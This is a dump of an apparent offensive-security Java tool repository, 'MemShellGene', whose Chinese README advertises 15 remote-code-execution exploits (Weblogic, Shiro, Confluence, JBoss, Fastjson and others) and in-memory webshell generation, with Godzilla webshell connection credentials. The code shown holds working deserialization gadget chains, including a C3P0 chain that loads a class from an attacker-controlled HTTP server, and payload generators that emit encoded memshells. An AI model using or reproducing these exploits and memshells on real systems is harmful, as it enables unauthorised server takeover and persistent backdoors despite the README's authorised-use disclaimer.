├── .gitignore ├── README.md ├── lib ├── coherence-1.0.0.jar ├── coherence-rest-1.0.0.jar ├── coherence-web-1.0.0.jar ├── com.oracle.core.coherence.integration-1.0.0.jar ├── commons-beanutils-1.8.3.jar ├── javafx-swt.jar ├── javafx.base.jar ├── javafx.controls.jar ├── javafx.fxml.jar ├── javafx.graphics.jar ├── javafx.media.jar ├── javafx.swing.jar ├── javafx.web.jar ├── jsafeFIPS-1.0.jar ├── permit-reflect-0.3.jar ├── resin-1.0.0.jar └── wlcipher-1.0.0.jar ├── pom.xml └── src └── main ├── java ├── META-INF │ └── MANIFEST.MF ├── config │ └── Config.java ├── core │ ├── GenerateMemShell.java │ ├── GeneratePayload.java │ ├── enumtypes │ │ ├── GadgetType.java │ │ └── PayloadType.java │ ├── gadgets │ │ ├── C3P0.java │ │ ├── CommonsBeanutils1.java │ │ ├── CommonsBeanutils1_183.java │ │ ├── CommonsBeanutilsAttrCompare.java │ │ ├── CommonsBeanutilsAttrCompare_183.java │ │ ├── CommonsBeanutilsObjectToStringComparator.java │ │ ├── CommonsBeanutilsObjectToStringComparator_183.java │ │ ├── CommonsBeanutilsPropertySource.java │ │ ├── CommonsBeanutilsPropertySource_183.java │ │ ├── CommonsBeanutilsString.java │ │ ├── CommonsBeanutilsString_183.java │ │ ├── CommonsBeanutilsString_192s.java │ │ ├── CommonsCollections5.java │ │ ├── CommonsCollections6.java │ │ ├── CommonsCollectionsK1.java │ │ ├── CommonsCollectionsK2.java │ │ ├── Jdk7u21.java │ │ ├── Spring1.java │ │ └── utils │ │ │ ├── ClassFiles.java │ │ │ ├── Gadgets.java │ │ │ ├── JavassistClassLoader.java │ │ │ ├── Reflections.java │ │ │ └── Util.java │ ├── memshell │ │ ├── CommandMemShell.java │ │ ├── FastJsonFilterMemShell.java │ │ ├── FastJsonListenerMemShell.java │ │ ├── GlassFishFilterMemShell.java │ │ ├── GlassFishListenerMemShell.java │ │ ├── JBossFilterMemShell.java │ │ ├── JBossListenerMemShell.java │ │ ├── JettyFilterMemShell.java │ │ ├── JettyListenerMemShell.java │ │ ├── NettyHandlerMemShell.java │ │ ├── ResinFilterMemShell.java │ │ ├── ResinListenerMemShell.java │ │ ├── ShiroMemShell.java │ │ ├── 
SpringBootMemShell.java │ │ ├── SpringControllerMemShell.java │ │ ├── SpringInterceptorMemShell.java │ │ ├── SpringWebfluxHandlerMemShell.java │ │ ├── TomcatFilterMemShell.java │ │ ├── TomcatListenerMemShell.java │ │ ├── TongWebFilterMemShell.java │ │ ├── TongWebListenerMemShell.java │ │ ├── WebSphereFilterMemShell.java │ │ ├── WeblogicFilterMemShell.java │ │ ├── WeblogicFilterMemShell_CVE_2020_14756.java │ │ ├── WeblogicListenerMemShell.java │ │ └── WeblogicListenerMemShell_CVE_2020_14756.java │ ├── memshellstr │ │ └── ConstantTemplate.java │ ├── payloads │ │ ├── Confluence_CVE_2021_26084.java │ │ ├── Confluence_CVE_2022_26134.java │ │ ├── ECology_BeanShell_RCE.java │ │ ├── Fastjson_AutoType_ByPass.java │ │ ├── Seeyon_Unauthorized_RCE.java │ │ ├── SpringGateWay_CVE_2022_22947.java │ │ ├── Weblogic_0Day_JDK7.java │ │ ├── Weblogic_CVE_2020_14756.java │ │ ├── Weblogic_CVE_2020_14883.java │ │ └── Weblogic_CVE_2020_2883.java │ └── utils │ │ ├── Cache.java │ │ ├── Compiler.java │ │ ├── Config.java │ │ ├── MemMap.java │ │ ├── MyURLClassLoader.java │ │ └── Util.java ├── exp │ ├── AttackBase.java │ ├── BaseExp.java │ ├── Run.java │ ├── confluence │ │ ├── Confluence_CVE_2021_26084.java │ │ └── Confluence_CVE_2022_26134.java │ ├── ecology │ │ └── ECology_BeanShell_RCE.java │ ├── fastjson │ │ └── Fastjson_AutoType_ByPass.java │ ├── jboss │ │ ├── JBoss_CVE_2017_12149.java │ │ └── JBoss_CVE_2017_7504.java │ ├── seeyon │ │ └── Seeyon_Unauthorized_RCE.java │ ├── shiro │ │ └── Shiro_550.java │ ├── springgateway │ │ └── SpringGateWay_CVE_2022_22947.java │ └── weblogic │ │ ├── Weblogic_0Day_1.java │ │ ├── Weblogic_CVE_2020_14756.java │ │ ├── Weblogic_CVE_2020_14883.java │ │ └── Weblogic_CVE_2020_2883.java ├── ui │ ├── ComponentType.java │ ├── Config.java │ ├── Controller.java │ └── Main.java └── utils │ ├── MessagePrintBase.java │ ├── SystemInfo.java │ ├── SystemPrintMessage.java │ ├── TextAreaPrintMessage.java │ ├── Transformers.java │ ├── UserAgentUtil.java │ ├── Util.java │ ├── 
okhttplib │ ├── OkHttp.java │ ├── OkHttpProxyInterceptor.java │ ├── ProxyConfig.java │ ├── ProxySSLSocketFactory.java │ ├── ProxySocketFactory.java │ ├── ThreadLocalProxyAuthenticator.java │ └── TyrRequestBody.java │ └── weblogic │ ├── IIOPProtocolOperation.java │ ├── T3ProtocolOperation.java │ └── WeblogicGadget.java └── resources ├── META-INF └── MANIFEST.MF ├── data └── shiro_keys.txt ├── rmi.fxml └── sample.fxml /.gitignore: -------------------------------------------------------------------------------- 1 | .idea/ 2 | target/ 3 | output/ 4 | *.class 5 | 6 | -------------------------------------------------------------------------------- /README.md: -------------------------------------------------------------------------------- 1 | # MemShellGene 2 | 3 | ## 运行环境 4 | 已在下列JDK版本进行测试: 5 | 6 | 1. JDK 1.6.0_45 7 | 2. JDK 1.8.0_101 8 | 3. JDK 1.8.0_181 9 | 4. JDK 1.8.0_271 10 | 5. OpenJDK 11 11 | 12 | ## 启动 13 | java -jar MemShellGene.jar 14 | 15 | ## 简介 16 | ### Attack模块 17 | 18 | ![attack](https://github.com/suizhibo/MemShellGene/assets/28916595/6021410e-6020-47a7-84b2-ea63442b55f4) 19 | 20 | 21 | 22 | 23 | 24 | 该模式下提供如下15个EXP 25 | | EXP | 26 | |--------| 27 | |Shiro_550| 28 | |Weblogic_CVE_2020_14756| 29 | |Weblogic_CVE_2020_2883| 30 | |Weblogic_0Day_1| 31 | |Weblogic_CVE_2020_14883| 32 | |FastJson_AutoType_ByPass| 33 | |TongWeb| 34 | |Landray_BeabShell_RCE| 35 | |JBoss_CVE_2017_12149| 36 | |JBoss_CVE_2017_7504| 37 | |Confluence_CVE_2022_26134| 38 | |Confluence_CVE_2021_26084| 39 | |ECology_BeanShell_RCE| 40 | |Seeyon_Unauthorized_RCE| 41 | |SpringGateWay_CVE_2022_22947| 42 | 43 | 44 | ### Generate模块 45 | ![generate](https://github.com/suizhibo/MemShellGene/assets/28916595/d789f3fd-589e-48b3-aa4f-4f6580b977f0) 46 | 47 | 48 | 49 | 该模块涉及到Java的动态编译,需要正确配置java classpath,并确认该目录下的lib目录包含tools.jar。 50 | 使用该模块可以快速生成内存马的BASE64或者BCEL字符串。 51 | 52 | ![1111111111](https://github.com/suizhibo/MemShellGene/assets/28916595/ddfcc2a9-dd20-4175-8485-2139e79bb600) 53 | 54 | 55 | 56 | 
#### 内存马版本测试 57 | 58 | ![image](https://github.com/suizhibo/MemShellGene/assets/28916595/92452286-d0e0-41d7-8baf-9dd7ae62d7d8) 59 | 60 | 61 | 62 | 63 | 64 | #### 验证须知 65 | 1. Header:X-Requested-With: XmlHTTPRequest 66 | 2. 访问触发路径,若response返回Success,说明内存马注入成功 67 | 68 | 69 | #### 上线哥斯拉须知: 70 | 71 | 1. 密码: pAS3 72 | 73 | 2. 秘钥: key 74 | 75 | 3. Header:X-Requested-With: XMLHTTPRequest 76 | 77 | ![图片1](https://github.com/suizhibo/MemShellGene/assets/28916595/e6d8a13b-b0f7-4562-84a0-af57e774beb5) 78 | 79 | # 友情链接 80 | 内存马查杀 [MemShellKiller](https://github.com/suizhibo/MemShellKiller) 81 | 82 | # 免责声明 83 | 1. 娱乐用途优先:本工具设计的初衷是为了教育、研究和娱乐目的。它可以帮助您了解网络安全的基础知识,提升您的技能,以及在合法范围内进行测试。 84 | 85 | 2. 请勿非法使用:请记住,未经授权对他人的系统、网络或设备进行渗透测试是违法的。我们强烈建议并恳求您不要使用本工具进行任何非法活动。否则,后果自负(并且可能会有法律追究哦)。 86 | 87 | 3. 合法授权:请确保您仅在获得明确授权的情况下使用本工具进行渗透测试。这包括但不限于:您自己的设备和网络,或明确授权您进行测试的第三方。 88 | 89 | 4. 知识与责任并重:网络安全是一项崇高的事业,保护网络安全是每一个网络安全爱好者的责任。使用本工具进行合法的测试和研究,帮助提升整体网络安全水平,这才是我们共同的目标。 90 | 91 | 5. 技术支持有限:本工具“按现状”提供,我们不对其适用性或可能造成的任何损失负责。使用本工具之前,请确保您已充分了解其功能和潜在影响。 92 | 93 | 6. 玩得开心,但要有节制:我们希望您在使用本工具时能获得乐趣并学到新知识,但请务必保持理智和克制。不要因为一时兴起而越界,记住,网络冒险有时也是需要勇气的撤退。 94 | 95 | 最后提醒 96 | 当您点击下载或使用本工具时,即表示您已阅读并同意以上所有条款。请戴好您的虚拟防护帽,系紧您的安全带,准备好迎接一场合法且富有教育意义的网络冒险吧! 
97 | 98 | 99 | 100 | 101 | -------------------------------------------------------------------------------- /lib/coherence-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/coherence-1.0.0.jar -------------------------------------------------------------------------------- /lib/coherence-rest-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/coherence-rest-1.0.0.jar -------------------------------------------------------------------------------- /lib/coherence-web-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/coherence-web-1.0.0.jar -------------------------------------------------------------------------------- /lib/com.oracle.core.coherence.integration-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/com.oracle.core.coherence.integration-1.0.0.jar -------------------------------------------------------------------------------- /lib/commons-beanutils-1.8.3.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/commons-beanutils-1.8.3.jar -------------------------------------------------------------------------------- /lib/javafx-swt.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx-swt.jar 
-------------------------------------------------------------------------------- /lib/javafx.base.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.base.jar -------------------------------------------------------------------------------- /lib/javafx.controls.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.controls.jar -------------------------------------------------------------------------------- /lib/javafx.fxml.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.fxml.jar -------------------------------------------------------------------------------- /lib/javafx.graphics.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.graphics.jar -------------------------------------------------------------------------------- /lib/javafx.media.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.media.jar -------------------------------------------------------------------------------- /lib/javafx.swing.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.swing.jar -------------------------------------------------------------------------------- /lib/javafx.web.jar: 
-------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/javafx.web.jar -------------------------------------------------------------------------------- /lib/jsafeFIPS-1.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/jsafeFIPS-1.0.jar -------------------------------------------------------------------------------- /lib/permit-reflect-0.3.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/permit-reflect-0.3.jar -------------------------------------------------------------------------------- /lib/resin-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/resin-1.0.0.jar -------------------------------------------------------------------------------- /lib/wlcipher-1.0.0.jar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/suizhibo/MemShellGene/029e7ecab0822de53a326883b8927666b521f845/lib/wlcipher-1.0.0.jar -------------------------------------------------------------------------------- /src/main/java/META-INF/MANIFEST.MF: -------------------------------------------------------------------------------- 1 | Manifest-Version: 1.0 2 | Main-Class: core.GeneratePayload 3 | 4 | -------------------------------------------------------------------------------- /src/main/java/core/GenerateMemShell.java: -------------------------------------------------------------------------------- 1 | package core; 2 | 3 | import core.memshellstr.ConstantTemplate; 4 | import core.utils.Compiler; 
5 | import utils.Util; 6 | 7 | import java.lang.reflect.Field; 8 | import java.util.ArrayList; 9 | import java.util.HashMap; 10 | import java.util.List; 11 | import java.util.Map; 12 | 13 | public class GenerateMemShell { 14 | public static Map> shellCodeMapper = new HashMap>(); 15 | public static Map> optionsMapper = new HashMap>(); 16 | 17 | static { 18 | List options = new ArrayList(); 19 | options.add("-source"); 20 | options.add("1.8"); 21 | options.add("-target"); 22 | options.add("1.8"); 23 | optionsMapper.put("8", options); 24 | 25 | List options2 = new ArrayList(); 26 | options2.add("-source"); 27 | options2.add("1.7"); 28 | options2.add("-target"); 29 | options2.add("1.7"); 30 | optionsMapper.put("7", options2); 31 | 32 | List options3 = new ArrayList(); 33 | options3.add("-source"); 34 | options3.add("1.6"); 35 | options3.add("-target"); 36 | options3.add("1.6"); 37 | optionsMapper.put("6", options3); 38 | } 39 | 40 | 41 | public static void main(String[] args) { 42 | 43 | } 44 | 45 | public static String generateMemShell(String memName, String encodeType, String version) { 46 | Field constantName = null; 47 | String memShellString = ""; 48 | String encodeString = ""; 49 | Map shellcode = null; 50 | byte[] codeByte = new byte[0]; 51 | shellcode = shellCodeMapper.get(memName); 52 | if (shellcode != null && !shellcode.isEmpty()) { 53 | codeByte = shellcode.get(version); 54 | } 55 | if(codeByte == null || codeByte.length == 0){ 56 | try { 57 | Map tmp = new HashMap(); 58 | constantName = ConstantTemplate.class.getDeclaredField(memName); 59 | memShellString = (String) constantName.get(new ConstantTemplate()); 60 | shellcode = Compiler.createMemShell(memName, memShellString, optionsMapper.get(version)); 61 | codeByte = shellcode.get(memName); 62 | tmp.put(version, codeByte); 63 | shellCodeMapper.put(memName, tmp); 64 | } catch (Exception e) { 65 | e.printStackTrace(); 66 | } 67 | } 68 | try { 69 | if ("BASE64".equals(encodeType)) { 70 | encodeString = 
Util.base64Encode(codeByte); 71 | 72 | } else if ("BCEL".equals(encodeType)) { 73 | encodeString = Util.generateBcelCode2(codeByte); 74 | } 75 | } catch (Exception e) { 76 | e.printStackTrace(); 77 | } 78 | return encodeString; 79 | } 80 | } 81 | -------------------------------------------------------------------------------- /src/main/java/core/GeneratePayload.java: -------------------------------------------------------------------------------- 1 | package core; 2 | 3 | import java.lang.reflect.InvocationTargetException; 4 | import java.lang.reflect.Method; 5 | 6 | import core.enumtypes.GadgetType; 7 | import core.enumtypes.PayloadType; 8 | import org.apache.commons.cli.*; 9 | 10 | 11 | public class GeneratePayload { 12 | 13 | 14 | public static Object generatePayload(String gadGetType, String payloadType, String trojanType) throws ClassNotFoundException, 15 | NoSuchMethodException, InvocationTargetException, IllegalAccessException { 16 | Object payload = null; 17 | PayloadType payloadType1 = null; 18 | boolean flag = false; 19 | 20 | // for (GadgetType gt : GadgetType.values()) { 21 | // if (gadGetType.toLowerCase().equals(String.valueOf(gt))) { 22 | // flag = true; 23 | // break; 24 | // } 25 | // } 26 | // if (!flag) { 27 | // System.out.println("Not support gadGetType: " + gadGetType); 28 | // return payload; 29 | // } 30 | 31 | 32 | for (PayloadType pt : PayloadType.values()) { 33 | if (payloadType.toLowerCase().equals(String.valueOf(pt))) { 34 | payloadType1 = pt; 35 | break; 36 | } 37 | } 38 | if (!payloadType.contains("dnslog.cn") && payloadType1 == null) { 39 | System.out.println("Not support payloadType: " + payloadType); 40 | return payload; 41 | } 42 | 43 | Class clazz = null; 44 | try { 45 | String classPath = String.format("core.gadgets.%s", new Object[]{gadGetType}); 46 | clazz = Class.forName(classPath); 47 | }catch (ClassNotFoundException e){ 48 | String classPath = String.format("core.payloads.%s", new Object[]{gadGetType}); 49 | clazz = 
Class.forName(classPath); 50 | } 51 | 52 | Method method = clazz.getMethod("getObject", PayloadType.class, String.class); 53 | payload = (Object) method.invoke(clazz, payloadType1, trojanType); 54 | return payload; 55 | } 56 | 57 | public static byte[] generatePayloadByte(String gadGetType, String payloadType, String trojanType) throws ClassNotFoundException, 58 | NoSuchMethodException, InvocationTargetException, IllegalAccessException { 59 | byte[] payload = null; 60 | PayloadType payloadType1 = null; 61 | boolean flag = false; 62 | 63 | // for (GadgetType gt : GadgetType.values()) { 64 | // if (gadGetType.toLowerCase().equals(String.valueOf(gt))) { 65 | // flag = true; 66 | // break; 67 | // } 68 | // } 69 | // if (!flag) { 70 | // System.out.println("Not support gadGetType: " + gadGetType); 71 | // return payload; 72 | // } 73 | 74 | for (PayloadType pt : PayloadType.values()) { 75 | if (payloadType.toLowerCase().equals(String.valueOf(pt))) { 76 | payloadType1 = pt; 77 | break; 78 | } 79 | } 80 | if (!payloadType.contains("dnslog.cn") && payloadType1 == null) { 81 | System.out.println("Not support payloadType: " + payloadType); 82 | return payload; 83 | } 84 | 85 | Class clazz = null; 86 | try { 87 | String classPath = String.format("core.gadgets.%s", new Object[]{gadGetType}); 88 | clazz = Class.forName(classPath); 89 | }catch (ClassNotFoundException e){ 90 | String classPath = String.format("core.payloads.%s", new Object[]{gadGetType}); 91 | clazz = Class.forName(classPath); 92 | } 93 | Method method = clazz.getMethod("getByte", PayloadType.class, String.class); 94 | payload = (byte[]) method.invoke(clazz, payloadType1, trojanType); 95 | return payload; 96 | } 97 | 98 | public static void main(String[] args) throws ParseException { 99 | System.setProperty("org.apache.commons.collections.enableUnsafeSerialization", "true"); 100 | CommandLineParser parser = new BasicParser(); 101 | Options options = new Options(); 102 | options.addOption("g", "gadGetType", true, 
""); 103 | options.addOption("p", "payloadType", true, ""); 104 | options.addOption("t", "trojanType", true, ""); 105 | 106 | CommandLine commandLine = parser.parse(options, args); 107 | String gadGetType = commandLine.getOptionValue("g"); 108 | String payloadType = commandLine.getOptionValue("p"); 109 | String trojanType = commandLine.getOptionValue("t"); 110 | try { 111 | byte[] payload = generatePayloadByte(gadGetType, payloadType, trojanType); 112 | if (payload.length >1){ 113 | System.out.print(utils.Util.base64Encode(payload)); 114 | } 115 | } catch (ClassNotFoundException e) { 116 | e.printStackTrace(); 117 | } catch (NoSuchMethodException e) { 118 | e.printStackTrace(); 119 | } catch (InvocationTargetException e) { 120 | e.printStackTrace(); 121 | } catch (IllegalAccessException e) { 122 | e.printStackTrace(); 123 | } catch (Exception e) { 124 | e.printStackTrace(); 125 | } 126 | } 127 | } 128 | -------------------------------------------------------------------------------- /src/main/java/core/enumtypes/GadgetType.java: -------------------------------------------------------------------------------- 1 | package core.enumtypes; 2 | 3 | public enum GadgetType { 4 | commonsbeanutils1, 5 | commonsbeanutils2, 6 | commonscollectionsk1, 7 | commonscollectionsk2, 8 | commonscollections5, 9 | cve_2020_2883, 10 | cve_2020_14756_2, 11 | weblogic_0day_1, 12 | weblogic_day_1_jdk7, 13 | cve_2020_14883, 14 | fastjson, 15 | cve_2021_26084, 16 | ecology_rce, 17 | tyr_2021_00028, 18 | cve_2022_22947 19 | 20 | } 21 | -------------------------------------------------------------------------------- /src/main/java/core/enumtypes/PayloadType.java: -------------------------------------------------------------------------------- 1 | package core.enumtypes; 2 | 3 | public enum PayloadType { 4 | tongweblistenermemshell, 5 | glassfishlistenermemshell, 6 | fastjsonlistenermemshell, 7 | tongwebfiltermemshell, 8 | glassfishfiltermemshell, 9 | fastjsonfiltermemshell, 10 | 
tomcatlistenermemshell, 11 | tomcatfiltermemshell, 12 | springbootmemshell, 13 | jbossfiltermemshell, 14 | jbosslistenermemshell, 15 | shiromemshell, 16 | weblogiclistenermemshell_cve_2020_14756, 17 | weblogicfiltermemshell_cve_2020_14756, 18 | none, 19 | command, 20 | resinlistenermemshell, 21 | resinfiltermemshell, 22 | commandmemshell, 23 | weblogiclistenermemshell, 24 | jettylistenermemshell, 25 | jettyfiltermemshell, 26 | weblogicfiltermemshell, 27 | weblogicmemshell_cve_2020_14883, 28 | springwebfluxhandlermemshell, 29 | nettyhandlermemshell 30 | } 31 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/C3P0.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import com.mchange.v2.c3p0.PoolBackedDataSource; 4 | import com.mchange.v2.c3p0.impl.PoolBackedDataSourceBase; 5 | import core.enumtypes.PayloadType; 6 | import core.memshell.TomcatFilterMemShell; 7 | import core.memshell.TomcatListenerMemShell; 8 | import core.utils.Config; 9 | 10 | import javax.naming.NamingException; 11 | import javax.naming.Reference; 12 | import javax.naming.Referenceable; 13 | import javax.sql.ConnectionPoolDataSource; 14 | import javax.sql.PooledConnection; 15 | import java.io.ByteArrayOutputStream; 16 | import java.io.ObjectOutputStream; 17 | import java.io.PrintWriter; 18 | import java.lang.reflect.Field; 19 | import java.sql.SQLException; 20 | import java.sql.SQLFeatureNotSupportedException; 21 | import java.util.logging.Logger; 22 | 23 | 24 | public class C3P0 { 25 | public static byte[] getBytes(PayloadType type, String... 
param) throws Exception { 26 | 27 | String className; 28 | switch (type){ 29 | case tomcatfiltermemshell: 30 | className = TomcatFilterMemShell.class.getName(); 31 | break; 32 | case tomcatlistenermemshell: 33 | className = TomcatListenerMemShell.class.getName(); 34 | break; 35 | default: 36 | throw new IllegalStateException("Unexpected value: " + type); 37 | } 38 | 39 | PoolBackedDataSource b = PoolBackedDataSource.class.newInstance(); 40 | Field field = PoolBackedDataSourceBase.class.getDeclaredField("connectionPoolDataSource"); 41 | field.setAccessible(true); 42 | field.set(b, new PoolSource(className,"http://" + Config.ip + ":" + Config.httpPort + "/")); 43 | 44 | //序列化 45 | ByteArrayOutputStream baous = new ByteArrayOutputStream(); 46 | ObjectOutputStream oos = new ObjectOutputStream(baous); 47 | oos.writeObject(b); 48 | byte[] bytes = baous.toByteArray(); 49 | oos.close(); 50 | 51 | return bytes; 52 | } 53 | 54 | 55 | private static final class PoolSource implements ConnectionPoolDataSource, Referenceable { 56 | 57 | private String className; 58 | private String url; 59 | 60 | public PoolSource ( String className, String url ) { 61 | this.className = className; 62 | this.url = url; 63 | } 64 | 65 | public Reference getReference () throws NamingException { 66 | return new Reference("exploit", this.className, this.url); 67 | } 68 | 69 | public PrintWriter getLogWriter () throws SQLException {return null;} 70 | public void setLogWriter ( PrintWriter out ) throws SQLException {} 71 | public void setLoginTimeout ( int seconds ) throws SQLException {} 72 | public int getLoginTimeout () throws SQLException {return 0;} 73 | public Logger getParentLogger () throws SQLFeatureNotSupportedException {return null;} 74 | public PooledConnection getPooledConnection () throws SQLException {return null;} 75 | public PooledConnection getPooledConnection ( String user, String password ) throws SQLException {return null;} 76 | } 77 | } 78 | 
-------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutils1.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import java.math.BigInteger; 4 | import java.util.Comparator; 5 | import java.util.PriorityQueue; 6 | 7 | import core.enumtypes.PayloadType; 8 | import core.gadgets.utils.Gadgets; 9 | import core.gadgets.utils.Reflections; 10 | import core.utils.MyURLClassLoader; 11 | import core.utils.Util; 12 | import org.apache.commons.beanutils.BeanComparator; 13 | 14 | public class CommonsBeanutils1 { 15 | 16 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 17 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 18 | // mock method name until armed 19 | BeanComparator beanComparator = new BeanComparator("lowestSetBit"); 20 | PriorityQueue queue = new PriorityQueue(2, (Comparator)beanComparator); 21 | 22 | queue.add(new BigInteger("1")); 23 | queue.add(new BigInteger("1")); 24 | 25 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 26 | 27 | 28 | Object[] queueArray = (Object[])Reflections.getFieldValue(queue, "queue"); 29 | queueArray[0] = templates; 30 | queueArray[1] = templates; 31 | 32 | return queue; 33 | 34 | } 35 | 36 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 37 | Object queue = getObject(type, trojanType); 38 | return Util.serialize(queue); 39 | 40 | 41 | } 42 | } 43 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutils1_183.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import core.enumtypes.PayloadType; 4 | import core.gadgets.utils.Gadgets; 5 | import core.gadgets.utils.JavassistClassLoader; 6 | import core.gadgets.utils.Reflections; 7 | import 
core.utils.Util; 8 | import javassist.ClassClassPath; 9 | import javassist.ClassPool; 10 | import javassist.CtClass; 11 | import javassist.CtField; 12 | 13 | import java.math.BigInteger; 14 | import java.util.Comparator; 15 | import java.util.PriorityQueue; 16 | 17 | public class CommonsBeanutils1_183 { 18 | 19 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 20 | final Object templates = Gadgets.createTemplatesImpl(type, trojanType); 21 | 22 | // 修改BeanComparator类的serialVersionUID 23 | ClassPool pool = ClassPool.getDefault(); 24 | pool.insertClassPath(new ClassClassPath(Class.forName("org.apache.commons.beanutils.BeanComparator"))); 25 | final CtClass ctBeanComparator = pool.get("org.apache.commons.beanutils.BeanComparator"); 26 | try { 27 | CtField ctSUID = ctBeanComparator.getDeclaredField("serialVersionUID"); 28 | ctBeanComparator.removeField(ctSUID); 29 | }catch (javassist.NotFoundException e){} 30 | ctBeanComparator.addField(CtField.make("private static final long serialVersionUID = -3490850999041592962L;", ctBeanComparator)); 31 | final Comparator beanComparator = (Comparator)ctBeanComparator.toClass(new JavassistClassLoader()).newInstance(); 32 | ctBeanComparator.defrost(); 33 | Reflections.setFieldValue(beanComparator, "property", "lowestSetBit"); 34 | 35 | PriorityQueue queue = new PriorityQueue(2, (Comparator)beanComparator); 36 | 37 | queue.add(new BigInteger("1")); 38 | queue.add(new BigInteger("1")); 39 | 40 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 41 | 42 | Object[] queueArray = (Object[])Reflections.getFieldValue(queue, "queue"); 43 | queueArray[0] = templates; 44 | queueArray[1] = templates; 45 | 46 | return queue; 47 | } 48 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 49 | Object val = getObject(type, trojanType); 50 | return Util.serialize(val); 51 | } 52 | } 53 | 54 | 55 | 56 | 
-------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsAttrCompare.java: -------------------------------------------------------------------------------- 1 | package core.gadgets; 2 | 3 | import com.sun.org.apache.xerces.internal.dom.AttrNSImpl; 4 | import com.sun.org.apache.xerces.internal.dom.CoreDocumentImpl; 5 | import com.sun.org.apache.xml.internal.security.c14n.helper.AttrCompare; 6 | import core.enumtypes.PayloadType; 7 | import core.gadgets.utils.Gadgets; 8 | import core.gadgets.utils.Reflections; 9 | import core.utils.Util; 10 | import org.apache.commons.beanutils.BeanComparator; 11 | 12 | import java.util.PriorityQueue; 13 | import java.util.Queue; 14 | 15 | 16 | public class CommonsBeanutilsAttrCompare { 17 | 18 | public static Object getObject(PayloadType type, String trojanType) throws Exception { 19 | final Object template = Gadgets.createTemplatesImpl(type, trojanType); 20 | 21 | AttrNSImpl attrNS1 = new AttrNSImpl(); 22 | CoreDocumentImpl coreDocument = new CoreDocumentImpl(); 23 | attrNS1.setValues(coreDocument,"1","1","1"); 24 | 25 | BeanComparator beanComparator = new BeanComparator(null, new AttrCompare()); 26 | 27 | PriorityQueue queue = new PriorityQueue(2, beanComparator); 28 | 29 | 30 | queue.add(attrNS1); 31 | queue.add(attrNS1); 32 | 33 | 34 | Reflections.setFieldValue(queue, "queue", new Object[] { template, template }); 35 | 36 | Reflections.setFieldValue(beanComparator, "property", "outputProperties"); 37 | 38 | return (Queue)queue; 39 | } 40 | 41 | public static byte[] getByte(PayloadType type, String trojanType) throws Exception { 42 | Object val = getObject(type, trojanType); 43 | return Util.serialize(val); 44 | } 45 | } 46 | -------------------------------------------------------------------------------- /src/main/java/core/gadgets/CommonsBeanutilsAttrCompare_183.java: -------------------------------------------------------------------------------- 1 | package 
